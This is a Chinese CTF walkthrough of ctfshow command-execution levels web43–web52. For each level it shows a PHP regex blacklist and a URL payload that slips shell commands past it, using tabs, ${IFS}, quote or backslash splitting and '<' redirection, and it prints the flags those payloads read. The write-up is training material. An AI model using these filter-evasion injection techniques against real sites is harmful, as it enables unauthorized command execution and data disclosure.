ctfshow-web入门-命令执行(web43-web52)关于黑洞“ >/dev/null 2>1“的处理与绕过

2024-06-11 07:52

本文主要是介绍ctfshow-web入门-命令执行(web43-web52)关于黑洞“ >/dev/null 2>1“的处理与绕过,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

1、web43

2、web44

3、web45

4、web46

5、web47

6、web48

7、web49

8、web50

9、web51

10、web52


1、web43

在上一题 ‘黑洞’ 的基础上新增过滤:

preg_match("/\;|cat/i", $c)

 问题不大,我们不用分号和 cat 就行:

?c=ls||

payload: 

?c=tac flag.php||

拿到 flag:ctfshow{1327bbac-5c2b-44bc-ae8b-35790b8af546}

当然还有很多其他的文件查看命令都可以用,比如:more、less、nl 等

2、web44

preg_match("/;|cat|flag/i", $c)

新增过滤 flag,构造 payload:

?c=tac f*||

拿到 flag:ctfshow{61221e00-a6ab-44be-9f0f-01034265132b}

3、web45

新增过滤空格,使用 %09 代替 

preg_match("/\;|cat|flag| /i", $c)

构造 payload:

?c=tac%09f*||

拿到 flag:ctfshow{2e3d1abb-d4b6-41db-8078-5f557658403d}

使用 ${IFS} 代替也是可以的,payload:

?c=tac${IFS}f*||

说明:IFS 是 linux 的特殊变量,默认值是 space 空格,$ 是取变量值,$IFS 就代表空格。

使用 $IFS$9 也可以,构造 payload:

?c=tac$IFS$9f*||

4、web46

preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)

新增过滤数字、$、*,不使用这些即可,通配符使用问号?,空格使用 %09 代替。

构造 payload:

?c=tac%09fla?.php||

拿到 flag:ctfshow{545047aa-54aa-48ed-9a41-104cebfae6be}

这里特别说明下,为什么 %09 没有被正则匹配检测到?09 不是数字吗?

注意:我们传入的 c=%09 是 URL 编码,在 URL 编码中,%09 表示 ASCII 编码中的水平制表符(Tab 键),而不是数字 '0' 和 '9'。当服务器接收到请求时,它会对 URL 编码的参数进行解码,因此 c=%09 解析后会变成 c=\t,其中 \t 是水平制表符。

也就是说我们的正则匹配在 URL 解码之后才进行,所以不会被检测到。

此外还有很多其他的方法:

当我们换成 < 时发现问号进行通配不行,< 通常用于将一个命令的输出作为另一个命令的输入。

使用反斜杠转义绕过或者使用引号对绕过,payload:

将文件 flag.php 的内容作为 tac 命令的输入,并反向显示文件内容。 

?c=tac<fla\g.php||

或者

?c=tac<fla''g.php||

或者

?c=tac<fla""g.php||

使用 <> 代替空格也是可以的,payload:

?c=tac<>fla\g.php||

5、web47

preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)

新增过滤一些命令:more|less|head|sort|tail

用 tac 或者 nl 即可,直接拿上一题的 payload打:

?c=tac<fla\g.php||

拿到 flag:ctfshow{f0f59065-df11-4cec-b502-fc9a7e2c48c8}

6、web48

preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)

还是继续在新增过滤的命令和反引号`,依旧用上一题的 payload 就可以:

?c=tac<fla\g.php||

拿到 flag:ctfshow{27fb4c37-7767-412f-9389-0d90b5a9a361}

关于上面那些命令的介绍:

more:用于逐页显示文本文件内容。按空格键显示下一页,按 Enter 键显示下一行。

less:类似于 more,但提供了更多的功能,如向前翻页、向后翻页等。它更灵活且对大文件支持更好。

head:显示文件的开头部分,默认情况下显示文件的前 10 行。可以使用 -n 选项指定显示的行数。

sort:对文本文件进行排序,默认按字典顺序排序。可以使用不同的选项指定按照数字、日期等方式排序。

tail:显示文件的末尾部分,默认情况下显示文件的最后 10 行。可以使用 -n 选项指定显示的行数。

sed:流编辑器,用于对文本进行流式处理。可以进行文本替换、删除、插入等操作。

cut:用于从文本文件中剪切列。可以根据指定的分隔符将每行文本分割成多个字段,并选择特定的字段输出。

awk:功能强大的文本处理工具,可以对文本文件进行逐行处理,支持自定义处理逻辑、条件语句等。

strings:从二进制文件中提取可打印的字符串。常用于查看可执行文件或库文件中的文本信息。

od:以不同的格式显示文件的内容。可以将文件内容以八进制、十六进制等形式显示。

curl:用于在命令行中传输数据,支持多种协议,如 HTTP、HTTPS、FTP 等。常用于下载文件或与 Web 服务进行交互。

7、web49

新增过滤百分号 %,不用 %09,还是用上一题的 payload:

?c=tac<fla\g.php||

拿到 flag:ctfshow{288fc102-97b2-4eec-b76e-2bfdd30f318f}

8、web50

preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)

新增过滤水平制表符(tab 键)和 &,其中 \x 是一个转义序列,表示后面跟着的两位十六进制数代表一个字符。

还是可以继续用上一题的 payload:

?c=tac<fla\g.php||

拿到 flag:ctfshow{61d94bfa-55cc-4e6f-b99d-b300934322c8}

9、web51

preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)

新增过滤 tac 命令,使用 nl 绕过,构造 payload:

?c=nl<fla\g.php||

拿到 flag:ctfshow{076f8f1c-e0ad-41e5-b2e6-50fe0a655fa8}

10、web52

preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)

新增过滤大于、小于符号,但是美元符放出来了,构造 payload:

?c=nl${IFS}fla\g.php||

得到 $flag="flag_here"; 

flag 不在当前目录,看一下根目录:

?c=ls${IFS}/||

读取 flag:

?c=nl${IFS}/fl\ag||

拿到 flag:ctfshow{f043c560-aaea-4e22-9072-e6a5eb08d059}

这篇关于ctfshow-web入门-命令执行(web43-web52)关于黑洞“ >/dev/null 2>1“的处理与绕过的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1050581

相关文章

Spring Boot Maven 插件如何构建可执行 JAR 的核心配置

《SpringBootMaven插件如何构建可执行JAR的核心配置》SpringBoot核心Maven插件,用于生成可执行JAR/WAR,内置服务器简化部署,支持热部署、多环境配置及依赖管理... 目录前言一、插件的核心功能与目标1.1 插件的定位1.2 插件的 Goals(目标)1.3 插件定位1.4 核

从入门到进阶讲解Python自动化Playwright实战指南

《从入门到进阶讲解Python自动化Playwright实战指南》Playwright是针对Python语言的纯自动化工具,它可以通过单个API自动执行Chromium,Firefox和WebKit... 目录Playwright 简介核心优势安装步骤观点与案例结合Playwright 核心功能从零开始学习

Java堆转储文件之1.6G大文件处理完整指南

《Java堆转储文件之1.6G大文件处理完整指南》堆转储文件是优化、分析内存消耗的重要工具,:本文主要介绍Java堆转储文件之1.6G大文件处理的相关资料,文中通过代码介绍的非常详细,需要的朋友可... 目录前言文件为什么这么大?如何处理这个文件?分析文件内容(推荐)删除文件(如果不需要)查看错误来源如何避

使用Python构建一个高效的日志处理系统

《使用Python构建一个高效的日志处理系统》这篇文章主要为大家详细讲解了如何使用Python开发一个专业的日志分析工具,能够自动化处理、分析和可视化各类日志文件,大幅提升运维效率,需要的可以了解下... 目录环境准备工具功能概述完整代码实现代码深度解析1. 类设计与初始化2. 日志解析核心逻辑3. 文件处

Java docx4j高效处理Word文档的实战指南

《Javadocx4j高效处理Word文档的实战指南》对于需要在Java应用程序中生成、修改或处理Word文档的开发者来说,docx4j是一个强大而专业的选择,下面我们就来看看docx4j的具体使用... 目录引言一、环境准备与基础配置1.1 Maven依赖配置1.2 初始化测试类二、增强版文档操作示例2.

MyBatis-Plus通用中等、大量数据分批查询和处理方法

《MyBatis-Plus通用中等、大量数据分批查询和处理方法》文章介绍MyBatis-Plus分页查询处理,通过函数式接口与Lambda表达式实现通用逻辑,方法抽象但功能强大,建议扩展分批处理及流式... 目录函数式接口获取分页数据接口数据处理接口通用逻辑工具类使用方法简单查询自定义查询方法总结函数式接口

nginx -t、nginx -s stop 和 nginx -s reload 命令的详细解析(结合应用场景)

《nginx-t、nginx-sstop和nginx-sreload命令的详细解析(结合应用场景)》本文解析Nginx的-t、-sstop、-sreload命令,分别用于配置语法检... 以下是关于 nginx -t、nginx -s stop 和 nginx -s reload 命令的详细解析,结合实际应

C#连接SQL server数据库命令的基本步骤

《C#连接SQLserver数据库命令的基本步骤》文章讲解了连接SQLServer数据库的步骤,包括引入命名空间、构建连接字符串、使用SqlConnection和SqlCommand执行SQL操作,... 目录建议配合使用:如何下载和安装SQL server数据库-CSDN博客1. 引入必要的命名空间2.

SpringBoot结合Docker进行容器化处理指南

《SpringBoot结合Docker进行容器化处理指南》在当今快速发展的软件工程领域,SpringBoot和Docker已经成为现代Java开发者的必备工具,本文将深入讲解如何将一个SpringBo... 目录前言一、为什么选择 Spring Bootjavascript + docker1. 快速部署与

mybatis执行insert返回id实现详解

《mybatis执行insert返回id实现详解》MyBatis插入操作默认返回受影响行数,需通过useGeneratedKeys+keyProperty或selectKey获取主键ID,确保主键为自... 目录 两种方式获取自增 ID:1. ​​useGeneratedKeys+keyProperty(推